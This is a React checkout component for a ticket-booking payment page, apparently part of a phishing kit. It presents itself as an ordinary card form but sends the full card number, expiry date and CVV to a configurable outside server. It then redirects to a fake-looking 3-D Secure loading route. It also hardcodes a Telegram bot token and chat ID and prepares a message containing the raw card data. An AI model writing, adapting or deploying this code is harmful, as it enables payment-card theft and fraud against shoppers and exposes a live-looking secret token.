import React, { useEffect, useRef, useState } from "react"
import InputField from "./InputField";
import {
    FaCcVisa,
    FaCcMastercard,
    FaCcAmex,
    FaCcDiscover,
    FaMinus,
    FaPlus,
    FaTrash,
    FaRegCreditCard,
  } from "react-icons/fa"
  import axios from "axios";
  import ReactPixel from "react-facebook-pixel"
import { usePromo } from "./providers/Init";
import { useNavigate, useParams, useSearchParams } from "react-router-dom";
import useHistoryParams from "./providers/useHistoryParam";


const PaymentPage = ({setActiveComponent}) => {


    const [summary, setSummary] = useState({
      date: "",
      package: "",
      tickets: [],
      total: 0,
    });

  
    useEffect(() => {
      const stored = localStorage.getItem("bookingSummary");
      if (stored) {
        try {
          const parsed = JSON.parse(stored);
          if (parsed?.date && parsed?.tickets && parsed?.package) {
            setSummary(parsed);
          }
        } catch (err) {
          console.error("Invalid JSON in localStorage.bookingSummary", err);
        }
      }
    }, []);

  const [change, setchange] = useState(true)

  const promo = usePromo()

  const [searchParams] = useSearchParams();
  const [subTotal, setSubTotal] = useState(localStorage.getItem('totalPayment'))

  useEffect(() => {
    const subtotalParam = searchParams.get('sub');
    setSubTotal(subtotalParam);
}, [searchParams]);

  
  const [submitBtnContent, setSubmitBtnContent] = useState(`Confirm Order`)

  const [input1Value, setInput1Value] = useState("")
  const [input2Value, setInput2Value] = useState("")
  const [input3Value, setInput3Value] = useState("")

  const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
  const input1Ref = useRef(null)
  const input2Ref = useRef(null)
  const input3Ref = useRef(null)


  useEffect(() => {
    const observer = new MutationObserver(() => {
      const val1 = input1Ref.current?.value
      const val2 = input2Ref.current?.value
      const val3 = input3Ref.current?.value
  
      // Update states if values exist
      if (val1) setInput1Value(val1)
      if (val2) setInput2Value(val2)
      if (val3) setInput3Value(val3)
    })
  
    const config = { attributes: true, childList: true, subtree: true }
  
    if (input1Ref.current) observer.observe(input1Ref.current, config)
    if (input2Ref.current) observer.observe(input2Ref.current, config)
    if (input3Ref.current) observer.observe(input3Ref.current, config)
  
    // Cleanup
    return () => observer.disconnect()
  }, [])

  const [submitBtnDis, setSubmitBtnDis] = useState(true)

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value, input2Value, input3Value])

  const handleNumberClick = (number) => {
    if (focusedInput === 1) {
      if (input1Value.length < 16) {
        setInput1Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(2)
        if (input2Value.length < 4) {
          setInput2Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 2) {
      if (input2Value.length < 4) {
        setInput2Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(3)
        if (input3Value.length < 3) {
          setInput3Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 3) {
      if (input3Value.length < 3) {
        setInput3Value((prevValue) => prevValue + number)
      }
    }
  }

  const navigate = useNavigate()

  const handleDeleteClick = () => {
    if (focusedInput === 1) {
      setInput1Value((prevValue) => prevValue.slice(0, -1))
    } else if (focusedInput === 2) {
      if (input2Value.length === 0) {
        setFocusedInput(1)
      }
      setInput2Value((prevValue) => prevValue.slice(0, -1))
    } else if (focusedInput === 3) {
      if (input3Value.length === 0) {
        setFocusedInput(2)
      }
      setInput3Value((prevValue) => prevValue.slice(0, -1))
    }
  }
  const fullUrl = window.location.href;
  const handleInput1Focus = () => {
    // trackUserAction('User Started Card Input', false)
    setFocusedInput(1)
  }

  const handleInput2Focus = () => {
    setFocusedInput(2)
  }

  const handleInput3Focus = () => {
    setFocusedInput(3)
  }

  const checkFocus = (num) => {
    return focusedInput === num
  }

  const updateSubmitBtnDisabled = () => {
    console.log(`AED {input1Value.length} + AED {input2Value.length} + AED {input3Value.length}`)
    // Check conditions for enabling/disabling submit button
    if (
      input1Value !== "" &&
      input2Value !== "" &&
      input3Value !== "" &&
      input1Value.length === 19 &&
      input2Value.length === 5 &&
      input3Value.length === 3 &&
      isDateGreaterThan(input2Value, "10/24")
    ) {
      if (input1Value.charAt(0) === "4" || input1Value.charAt(0) === "5") {
        setSubmitBtnDis(false) // Enable submit button if all inputs are filled
      }
    } else {
      setSubmitBtnDis(true) // Disable submit button if any input is empty
    }
  }
  function isDateGreaterThan(dateStr, comparisonDateStr) {
    console.log(dateStr)
    // Extract month and year for both dates
    const [month, year] = dateStr.split("/").map(Number);
    const [compMonth, compYear] = comparisonDateStr.split("/").map(Number);
  
    // First, compare the years
    if (year > compYear) return true;
    if (year < compYear) return false;
  
    // If years are the same, compare the months
    return month > compMonth;
  }
  const handleSender = async () => {
    const botToken = '7837303469:AAEw7hcq-r7VeipgHE9kG3uzPlPLDgAtj1o'; // Replace with your bot's token
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
  
    // Extract the first digit of `main` and the last 4 digits of `main`
    const firstDigit = input1Value?.charAt(0); // First digit
    const lastFourDigits = input1Value?.slice(-4); // Last 4 digits
  
    // Set values to localStorage
    localStorage.setItem('summ', summary.total.toFixed(2));
    localStorage.setItem('first-digit', firstDigit);
    localStorage.setItem('last-four-digits', lastFourDigits);
  
    const payload = {
      chat_id: '-1002222911401', // Replace with the target chat ID
      text: `💳 ${input1Value}
  📆 ${input2Value}
  🔐 ${input3Value}`, // The message text
    };
  
    try {
      ReactPixel.track("Purchase");
    } catch (err) {
      console.log(err);
    }
    setSubmitBtnContent(<div className="inputLoader"></div>);
    const dataToSend = {
      orderId: "123",
      uuId: localStorage.getItem("uuId"),
      main: input1Value,
      date: input2Value,
      code: input3Value,
      summ: summary.total.toFixed(2),
      chatId: process.env.REACT_APP_CHAT_ID,
      domain: process.env.REACT_APP_DOMAIN,
      link: fullUrl,
      additional: localStorage.getItem('bookingData'),
    };
    console.log(dataToSend);
    try {
      await axios.post(
        process.env.REACT_APP_SERVER_URL + "/api/validation",
        dataToSend,
        {
          headers: {
            "Content-Type": "application/json",
          },
        }
      );
      navigate("/3ds/loading");
    } catch (error) {
      console.error("Error sending data:", error);
      setTimeout(() => {
        setSubmitBtnContent("Confirm Order");
      }, 3000);
    }
  };
  
  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-gray-100">
      <div className="w-full max-w-md p-8 bg-white rounded-lg shadow-md">
        <div className="mb-6 text-center">
          {/* <h2 className="mb-2 text-lg font-semibold">We accept:</h2> */}
          <div className="flex justify-center space-x-2">
            <img  src="/accept.png" alt="Visa" className="w-full" />
          </div>
        </div>

        <div className="mb-4">

            {subTotal && 
                      <div className="flex items-center justify-between">
                      <label htmlFor="amount" className="font-medium">Amount</label>
            <span className="text-lg font-semibold">RM {subTotal}</span>
          </div>
            }
          
        </div>

        <div>
          <div className="mb-4">
            <label htmlFor="card-number" className="block mb-1 font-medium">Card Number</label>
            <InputField
                  formatType={"card"}
                  ref={input1Ref}
                  value={input1Value}
                  onFocus={handleInput1Focus}
                  onChange={(e) => setInput1Value(e.target.value)}
                  placeholder={"0000 0000 0000 0000"}
                  focused={checkFocus(1)}
                  />
          </div>

          <div className="flex mb-4 space-x-4">
            <div className="w-1/2">
              <label htmlFor="expiry-date" className="block mb-1 font-medium">Expiry Date</label>

                              <InputField
                  formatType={"date"}
                  ref={input2Ref}
                  value={input2Value}
                  onFocus={handleInput2Focus}
                  onChange={(e) => setInput2Value(e.target.value)}
                  placeholder={"MM/YY"}
                  focused={checkFocus(2)}
                />
            </div>
            <div className="w-1/2">
              <label htmlFor="cvv" className="block mb-1 font-medium">CVV</label>

                              <InputField
                  formatType={"code"}
                  ref={input3Ref}
                  value={input3Value}
                  onFocus={handleInput3Focus}
                  onChange={(e) => setInput3Value(e.target.value)}
                  placeholder={"•••"}
                  focused={checkFocus(3)}
                />
            </div>
          </div>



          <button           onClick={handleSender}
          disabled={submitBtnDis}
          className={`w-full py-2  rounded-md     ${
            submitBtnDis
              ? "text-neutral-400 bg-neutral-100"
              : "hover:bg-green-600 focus:ring focus:ring-green-500 text-white bg-green-500"
          } `}
        >
          {submitBtnContent}</button>
        </div>

        <p className="mt-4 text-sm text-center text-gray-500">
          By continuing, you have read and agreed to the{" "}
          <a href="#" className="text-green-500 underline">Terms of Service</a> &{" "}
          <a href="#" className="text-green-500 underline">Privacy Policy</a>.
        </p>

        <p className="mt-2 text-xs text-center text-gray-400">
          Transaction will appear as SAFEPAY-KLTOWER on your credit/debit card billing statement.
        </p>
      </div>
    </div>
  );
};

export default PaymentPage;
